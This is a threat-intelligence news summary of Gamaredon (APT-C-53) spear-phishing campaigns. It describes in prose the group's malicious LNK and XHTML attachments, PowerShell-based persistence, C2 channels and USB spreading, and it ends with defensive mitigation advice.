Gamaredon, a persistent threat actor since 2013, primarily targets the government, defense, diplomacy, and media sectors by employing sophisticated tactics, such as delivering malicious LNK and XHTML files via phishing emails.
These files execute malicious payloads, enabling unauthorized access and data exfiltration. By continuously evolving their techniques, Gamaredon poses a significant threat to organizations worldwide.
Phishing emails were analyzed to identify four distinct attack payloads, which were delivered as email attachments and were designed to deceive users into executing malicious files.
By either directly running attached files or decompressing and executing the contents of compressed files, attackers aimed to compromise target systems. Successful execution of these payloads enabled the implantation of malware, facilitating further malicious actions.
APT-C-53 (Gamaredon) employed spear-phishing emails with two main malicious attachment types, where the first involved a compressed file containing a malicious LNK that leverages mshta.exe to execute remote code from a specified URL.
While the second was a malicious XHTML file disguised as a download confirmation message, which downloaded another compressed archive containing a malicious LNK, also executed via mshta.exe.
Both LNKs downloaded subsequent payloads, as the attackers used a mix of direct IP addresses and domains hosted on trycloudflare.com for communication.
It uses malicious LNK files with PowerShell commands to download payloads from trycloudflare.com, which steal information like computer name and disk serial number and send them back to the C2 server.
Decoded responses containing malicious VBScript are then executed, where Gamaredon also uses HTA files disguised as attachments to deliver payloads by leveraging legitimate tools (mshta.exe, PowerShell) to bypass detection.
By using a malicious LNK file, it deploys a multi-stage PowerShell attack, where the LNK launches an initial script that writes itself to the user’s registry for persistence.
This “entry module” then spawns two background jobs: a “communication module” that retrieves commands from a C2 server and a “removable disk search module” that infects connected drives.
The communication module uses various methods to contact the C2 server, including hardcoded domains, Telegra.ph URLs, and DNS lookups. Received commands are decrypted using the system serial number and executed.
The removable disk search module creates LNK files that launch a replica of the initial script, ensuring the infection spreads to external storage, and the initial script modifies the registry to guarantee its execution on every system boot.
360 Advanced Threat Research Institute is actively monitoring APT-C-53 (Gamaredon) and its ongoing attacks. To mitigate risks associated with these attacks, organizations should enhance email security by deploying advanced gateway solutions to filter malicious content, especially LNK files and compressed files.
Robust system and network monitoring is crucial, focusing on system startup items, registry modifications, and PowerShell script executions, while terminal security should be strengthened by installing and updating antivirus and antimalware software.
